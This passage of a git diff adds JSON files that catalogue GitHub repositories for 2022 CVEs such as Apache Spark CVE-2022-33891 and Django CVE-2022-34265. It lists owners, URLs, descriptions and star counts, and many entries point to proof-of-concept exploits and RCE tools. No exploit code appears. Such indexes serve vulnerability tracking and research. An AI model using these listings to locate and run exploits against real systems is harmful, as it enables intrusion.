"2024-08-26T13:05:06Z", + "pushed_at": "2022-09-07T18:12:27Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 87, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 515842699, + "name": "CVE-2022-33891", + "full_name": "nanaao\/CVE-2022-33891", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-33891", + "description": "PoC for CVE-2022-33891", + "fork": false, + "created_at": "2022-07-20T05:15:28Z", + "updated_at": "2022-07-20T05:15:24Z", + "pushed_at": "2022-07-19T23:20:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 516156505, + "name": "cve-2022-33891", + "full_name": "AkbarTrilaksana\/cve-2022-33891", + "owner": { + "login": "AkbarTrilaksana", + "id": 108668044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108668044?v=4", + "html_url": "https:\/\/github.com\/AkbarTrilaksana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkbarTrilaksana\/cve-2022-33891", + "description": null, + "fork": false, + "created_at": "2022-07-20T22:52:43Z", + "updated_at": "2022-09-19T13:06:15Z", + "pushed_at": "2024-06-18T14:07:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 517259493, + "name": "cve-2022-33891", + "full_name": "llraudseppll\/cve-2022-33891", + "owner": { + "login": "llraudseppll", + "id": 50292087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50292087?v=4", + "html_url": "https:\/\/github.com\/llraudseppll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/llraudseppll\/cve-2022-33891", + "description": "Apache Spark RCE", + "fork": false, + "created_at": "2022-07-24T07:45:46Z", + "updated_at": "2024-08-12T20:25:24Z", + "pushed_at": "2022-07-24T07:48:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-33891" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 519637095, + "name": "CVE-2022-33891", + "full_name": "AmoloHT\/CVE-2022-33891", + "owner": { + "login": "AmoloHT", + "id": 106687805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106687805?v=4", + "html_url": "https:\/\/github.com\/AmoloHT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AmoloHT\/CVE-2022-33891", + "description": "「💥」CVE-2022-33891 - Apache Spark Command Injection", + "fork": false, + "created_at": "2022-07-30T23:02:16Z", + "updated_at": "2024-08-12T20:25:43Z", + "pushed_at": "2022-08-01T21:30:09Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "code", + "code-injection", + "command", + "concept", + "cve", + "cve-2022-33891", + "exploit", + "hacking", + "injection", + "poc", + "proof", + "proof-of-concept", + "python", + "rce", + "script", + "shell", + "spark" + ], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 524526248, + "name": "CVE-2022-33891", + "full_name": "DrLinuxOfficial\/CVE-2022-33891", + "owner": { + "login": "DrLinuxOfficial", + "id": 88365653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88365653?v=4", + "html_url": "https:\/\/github.com\/DrLinuxOfficial", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DrLinuxOfficial\/CVE-2022-33891", + "description": "CVE-2022-33891 Exploit For Apache Spark", + "fork": false, + "created_at": "2022-08-13T23:02:56Z", + "updated_at": "2022-08-15T02:26:44Z", + "pushed_at": "2022-08-13T23:07:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 530137358, + "name": "Apache-spark-CVE-2022-33891", + "full_name": "Vulnmachines\/Apache-spark-CVE-2022-33891", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Apache-spark-CVE-2022-33891", + "description": "Apache Spark RCE - CVE-2022-33891", + "fork": false, + "created_at": "2022-08-29T08:48:38Z", + "updated_at": "2022-08-31T08:16:54Z", + "pushed_at": "2022-08-30T12:03:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 575180100, + "name": "lab_security_apache_spark_emulation_detection", + "full_name": "ps-interactive\/lab_security_apache_spark_emulation_detection", + "owner": { + "login": "ps-interactive", + "id": 35313392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35313392?v=4", + "html_url": "https:\/\/github.com\/ps-interactive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ps-interactive\/lab_security_apache_spark_emulation_detection", + "description": "For CVE-2022-33891 Apache Spark: Emulation and Detection by West Shepherd", + "fork": false, + "created_at": "2022-12-06T23:44:30Z", + "updated_at": "2024-08-19T21:35:03Z", + "pushed_at": "2024-08-19T21:35:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 723685053, + "name": "cve-2022-33891-fix", + "full_name": "elsvital\/cve-2022-33891-fix", + "owner": { + "login": "elsvital", + "id": 4923784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4923784?v=4", + "html_url": "https:\/\/github.com\/elsvital", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elsvital\/cve-2022-33891-fix", + "description": null, + "fork": false, + "created_at": "2023-11-26T13:09:28Z", + "updated_at": "2023-11-26T13:47:47Z", + "pushed_at": "2023-11-26T13:52:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 761826205, + "name": "CVE-2022-33891-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2022-33891-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2022-33891-EXPLOIT", + "description": "A PoC exploit for CVE-2022-33891 - Apache Spark UI Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-02-22T15:05:00Z", + "updated_at": "2024-08-03T02:02:52Z", + "pushed_at": "2024-02-22T16:19:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-33891", + "cve-2022-33891-poc", + "exploit", + "hacking", + "poc", + "remote-code-execution" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-33980.json b/2022/CVE-2022-33980.json new file mode 100644 index 0000000000..c7968fd12f --- /dev/null +++ b/2022/CVE-2022-33980.json @@ -0,0 +1,160 @@ +[ + { + "id": 511837211, + "name": "CVE-2022-33980-Apache-Commons-Configuration-RCE", + "full_name": "tangxiaofeng7\/CVE-2022-33980-Apache-Commons-Configuration-RCE", + "owner": { + "login": "tangxiaofeng7", + "id": 45926593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926593?v=4", + "html_url": "https:\/\/github.com\/tangxiaofeng7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tangxiaofeng7\/CVE-2022-33980-Apache-Commons-Configuration-RCE", + "description": "CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞", + "fork": false, + "created_at": "2022-07-08T09:25:42Z", + "updated_at": "2024-08-12T20:24:50Z", + "pushed_at": "2022-07-08T09:27:48Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 40, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 523185323, + "name": "CVE-2022-33980", + "full_name": "HKirito\/CVE-2022-33980", + "owner": { + "login": "HKirito", + "id": 40173190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40173190?v=4", + "html_url": "https:\/\/github.com\/HKirito", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HKirito\/CVE-2022-33980", + "description": "CVE", + "fork": false, + "created_at": "2022-08-10T03:21:19Z", + "updated_at": "2024-08-12T20:26:02Z", + "pushed_at": "2022-10-20T09:00:26Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-33980", + "cve-2022-42889" + ], + "visibility": "public", + "forks": 11, + "watchers": 32, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 553195331, + "name": "CVE-2022-33980-POC", + "full_name": "sammwyy\/CVE-2022-33980-POC", + "owner": { + "login": "sammwyy", + "id": 44925968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44925968?v=4", + "html_url": "https:\/\/github.com\/sammwyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sammwyy\/CVE-2022-33980-POC", + "description": "POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)", + "fork": false, + "created_at": "2022-10-17T21:39:03Z", + "updated_at": "2023-05-30T08:44:33Z", + "pushed_at": "2022-10-17T21:45:54Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 581117627, + "name": "CVE-2022-33980-POC", + "full_name": "P0lar1ght\/CVE-2022-33980-POC", + "owner": { + "login": "P0lar1ght", + "id": 92381585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92381585?v=4", + "html_url": "https:\/\/github.com\/P0lar1ght", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/P0lar1ght\/CVE-2022-33980-POC", + "description": null, + "fork": false, + "created_at": "2022-12-22T10:16:08Z", + "updated_at": "2024-05-20T07:48:59Z", + "pushed_at": "2022-12-22T10:18:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 667968718, + "name": "riskootext4shell", + "full_name": "joseluisinigo\/riskootext4shell", + "owner": { + "login": "joseluisinigo", + "id": 7033429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7033429?v=4", + "html_url": "https:\/\/github.com\/joseluisinigo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joseluisinigo\/riskootext4shell", + "description": "text4shell script for text coomons < =1.10 CVE-2022-33980", + "fork": false, + "created_at": "2023-07-18T17:55:58Z", + "updated_at": "2023-07-18T20:20:09Z", + "pushed_at": "2023-07-18T17:58:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34169.json b/2022/CVE-2022-34169.json new file mode 100644 index 0000000000..2841207bcf --- /dev/null +++ b/2022/CVE-2022-34169.json @@ -0,0 +1,64 @@ +[ + { + "id": 524931119, + "name": "CVE-2022-34169", + "full_name": "bor8\/CVE-2022-34169", + "owner": { + "login": "bor8", + "id": 5301068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5301068?v=4", + "html_url": "https:\/\/github.com\/bor8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bor8\/CVE-2022-34169", + "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-34169", + "fork": false, + "created_at": "2022-08-15T09:43:08Z", + "updated_at": "2022-11-09T11:20:23Z", + "pushed_at": "2022-09-01T09:26:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589838604, + "name": "AutoGenerateXalanPayload", + "full_name": "flowerwind\/AutoGenerateXalanPayload", + "owner": { + "login": "flowerwind", + "id": 35595721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35595721?v=4", + "html_url": "https:\/\/github.com\/flowerwind", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flowerwind\/AutoGenerateXalanPayload", + "description": "cve-2022-34169 延伸出的Jdk Xalan的payload自动生成工具,可根据不同的Jdk生成出其所对应的xslt文件", + "fork": false, + "created_at": "2023-01-17T03:48:11Z", + "updated_at": "2024-11-26T12:57:54Z", + "pushed_at": "2023-01-17T12:27:08Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 88, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34265.json b/2022/CVE-2022-34265.json new file mode 100644 index 0000000000..68f4ee5adf --- /dev/null +++ b/2022/CVE-2022-34265.json @@ -0,0 +1,126 @@ +[ + { + "id": 511432180, + "name": "CVE-2022-34265", + "full_name": "aeyesec\/CVE-2022-34265", + "owner": { + "login": "aeyesec", + "id": 61375985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61375985?v=4", + "html_url": "https:\/\/github.com\/aeyesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeyesec\/CVE-2022-34265", + "description": "PoC for CVE-2022-34265 (Django)", + "fork": false, + "created_at": "2022-07-07T07:45:28Z", + "updated_at": "2024-08-12T20:24:48Z", + "pushed_at": "2022-07-30T07:53:43Z", + "stargazers_count": 123, + "watchers_count": 123, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 123, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 513523694, + "name": "CVE-2022-34265", + "full_name": "traumatising\/CVE-2022-34265", + "owner": { + "login": "traumatising", + "id": 109222893, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109222893?v=4", + "html_url": "https:\/\/github.com\/traumatising", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/traumatising\/CVE-2022-34265", + "description": "CVE-2022-34265 Vulnerability ", + "fork": false, + "created_at": "2022-07-13T13:02:41Z", + "updated_at": "2022-07-17T10:07:36Z", + "pushed_at": "2022-07-13T13:07:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 528313090, + "name": "CVE-2022-34265", + "full_name": "ZhaoQi99\/CVE-2022-34265", + "owner": { + "login": "ZhaoQi99", + "id": 25344334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25344334?v=4", + "html_url": "https:\/\/github.com\/ZhaoQi99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZhaoQi99\/CVE-2022-34265", + "description": "PoC for CVE-2022-34265", + "fork": false, + "created_at": "2022-08-24T07:29:30Z", + "updated_at": "2023-02-14T21:32:51Z", + "pushed_at": "2022-08-26T03:28:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 534397698, + "name": "CTF_Django_CVE-2022-34265", + "full_name": "lnwza0x0a\/CTF_Django_CVE-2022-34265", + "owner": { + "login": "lnwza0x0a", + "id": 96345719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96345719?v=4", + "html_url": "https:\/\/github.com\/lnwza0x0a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnwza0x0a\/CTF_Django_CVE-2022-34265", + "description": null, + "fork": false, + "created_at": "2022-09-08T21:22:28Z", + "updated_at": "2022-10-07T11:01:14Z", + "pushed_at": "2022-09-08T22:10:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34527.json b/2022/CVE-2022-34527.json new file mode 100644 index 0000000000..5955ac475c --- /dev/null +++ b/2022/CVE-2022-34527.json @@ -0,0 +1,33 @@ +[ + { + "id": 629316987, + "name": "CVE-2022-34527_D-Link_DSL-3782_Router_command_injection", + "full_name": "FzBacon\/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection", + "owner": { + "login": "FzBacon", + "id": 48304150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48304150?v=4", + "html_url": "https:\/\/github.com\/FzBacon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FzBacon\/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection", + "description": null, + "fork": false, + "created_at": "2023-04-18T04:26:49Z", + "updated_at": "2023-04-18T04:27:04Z", + "pushed_at": "2023-04-18T10:48:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34556.json b/2022/CVE-2022-34556.json new file mode 100644 index 0000000000..b8473bb306 --- /dev/null +++ b/2022/CVE-2022-34556.json @@ -0,0 +1,33 @@ +[ + { + "id": 595824795, + "name": "CVE-2022-34556", + "full_name": "Halcy0nic\/CVE-2022-34556", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-34556", + "description": "Proof of concept for CVE-2022-34556", + "fork": false, + "created_at": "2023-01-31T22:07:50Z", + "updated_at": "2024-07-02T20:34:40Z", + "pushed_at": "2023-01-31T22:31:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3464.json b/2022/CVE-2022-3464.json new file mode 100644 index 0000000000..2bafc2b4bf --- /dev/null +++ b/2022/CVE-2022-3464.json @@ -0,0 +1,33 @@ +[ + { + "id": 583195681, + "name": "CVE-2022-3464", + "full_name": "GYLQ\/CVE-2022-3464", + "owner": { + "login": "GYLQ", + "id": 15842234, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15842234?v=4", + "html_url": "https:\/\/github.com\/GYLQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GYLQ\/CVE-2022-3464", + "description": "A vulnerability classified as problematic has been found in puppyCMS up to 5.1. This affects an unknown part of the file \/admin\/settings.php. The manipulation of the argument site_name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-2 CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2022-12-29T03:39:33Z", + "updated_at": "2023-02-20T13:51:18Z", + "pushed_at": "2022-12-29T03:38:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34683.json b/2022/CVE-2022-34683.json new file mode 100644 index 0000000000..99b5f2e46c --- /dev/null +++ b/2022/CVE-2022-34683.json @@ -0,0 +1,33 @@ +[ + { + "id": 588700609, + "name": "CVE-2022-34683", + "full_name": "gmh5225\/CVE-2022-34683", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2022-34683", + "description": "NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-13T19:18:02Z", + "updated_at": "2023-02-20T15:21:34Z", + "pushed_at": "2023-01-06T23:41:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34715.json b/2022/CVE-2022-34715.json new file mode 100644 index 0000000000..1c21f0e8a4 --- /dev/null +++ b/2022/CVE-2022-34715.json @@ -0,0 +1,33 @@ +[ + { + "id": 536031760, + "name": "CVE-2022-34715-POC", + "full_name": "Starssgo\/CVE-2022-34715-POC", + "owner": { + "login": "Starssgo", + "id": 50407469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50407469?v=4", + "html_url": "https:\/\/github.com\/Starssgo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Starssgo\/CVE-2022-34715-POC", + "description": "CVE-2022-34715-POC pcap", + "fork": false, + "created_at": "2022-09-13T08:33:03Z", + "updated_at": "2023-11-05T06:49:45Z", + "pushed_at": "2022-09-13T08:39:36Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34718.json b/2022/CVE-2022-34718.json new file mode 100644 index 0000000000..8e67764116 --- /dev/null +++ b/2022/CVE-2022-34718.json @@ -0,0 +1,33 @@ +[ + { + "id": 544874385, + "name": "CVE-2022-34718-PoC", + "full_name": "SecLabResearchBV\/CVE-2022-34718-PoC", + "owner": { + "login": "SecLabResearchBV", + "id": 114392470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114392470?v=4", + "html_url": "https:\/\/github.com\/SecLabResearchBV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecLabResearchBV\/CVE-2022-34718-PoC", + "description": null, + "fork": false, + "created_at": "2022-10-03T11:39:25Z", + "updated_at": "2024-06-27T12:01:56Z", + "pushed_at": "2022-10-10T08:57:29Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 47, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34753.json b/2022/CVE-2022-34753.json new file mode 100644 index 0000000000..f67461e00e --- /dev/null +++ b/2022/CVE-2022-34753.json @@ -0,0 +1,37 @@ +[ + { + "id": 695311817, + "name": "CVE-2022-34753-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2022-34753-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2022-34753-EXPLOIT", + "description": "A PoC exploit for CVE-2022-34753 - OS Command Injection in SpaceLogic C-Bus Home Controller", + "fork": false, + "created_at": "2023-09-22T20:41:19Z", + "updated_at": "2024-08-03T02:03:40Z", + "pushed_at": "2023-09-22T20:58:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "exploitation", + "hacking" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34913.json b/2022/CVE-2022-34913.json new file mode 100644 index 0000000000..a0ea615994 --- /dev/null +++ b/2022/CVE-2022-34913.json @@ -0,0 +1,33 @@ +[ + { + "id": 595832872, + "name": "CVE-2022-34913", + "full_name": "Halcy0nic\/CVE-2022-34913", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-34913", + "description": "Proof of concept for CVE-2022-34913", + "fork": false, + "created_at": "2023-01-31T22:37:29Z", + "updated_at": "2024-07-02T20:34:32Z", + "pushed_at": "2023-01-31T23:00:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34918.json b/2022/CVE-2022-34918.json new file mode 100644 index 0000000000..6df2473585 --- /dev/null +++ b/2022/CVE-2022-34918.json @@ -0,0 +1,157 @@ +[ + { + "id": 515581938, + "name": "CVE-2022-34918-LPE-PoC", + "full_name": "randorisec\/CVE-2022-34918-LPE-PoC", + "owner": { + "login": "randorisec", + "id": 23558951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23558951?v=4", + "html_url": "https:\/\/github.com\/randorisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/randorisec\/CVE-2022-34918-LPE-PoC", + "description": null, + "fork": false, + "created_at": "2022-07-19T12:46:45Z", + "updated_at": "2024-12-15T22:43:28Z", + "pushed_at": "2022-09-06T14:05:22Z", + "stargazers_count": 244, + "watchers_count": 244, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 244, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 517351313, + "name": "CVE-2022-34918-LPE-PoC", + "full_name": "merlinepedra25\/CVE-2022-34918-LPE-PoC", + "owner": { + "login": "merlinepedra25", + "id": 69723528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69723528?v=4", + "html_url": "https:\/\/github.com\/merlinepedra25", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/merlinepedra25\/CVE-2022-34918-LPE-PoC", + "description": null, + "fork": false, + "created_at": "2022-07-24T14:47:40Z", + "updated_at": "2024-10-02T17:30:07Z", + "pushed_at": "2022-07-24T14:47:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 